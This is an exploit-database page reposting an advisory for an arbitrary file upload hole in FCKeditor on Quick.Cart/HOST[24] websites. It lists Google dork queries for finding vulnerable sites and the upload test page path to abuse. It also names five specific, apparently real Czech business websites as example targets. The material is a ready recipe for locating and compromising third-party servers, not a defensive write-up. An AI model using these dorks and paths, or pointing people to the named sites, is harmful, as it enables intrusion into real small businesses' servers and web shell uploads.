Advertisement






Powered by Quick.Cart & HOST[24] Fckeditor Arbitrary File Upload Vulnerability

CVE Category Price Severity
N/A CWE-264 $500 - $1,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-06-26
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060297

Below is a copy:

Powered by Quick.Cart & HOST[24] Fckeditor Arbitrary File Upload Vulnerability
#################################################################################################

# Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 25/06/2018
# Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Google Dorks : 

intext:''Copyright  2008 www.univex.cz''

intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz

# Exploit : .../fckeditor/editor/filemanager/connectors/uploadtest.html

# Path : /files/....

#################################################################################################

# Example Sites :  

designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html

################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.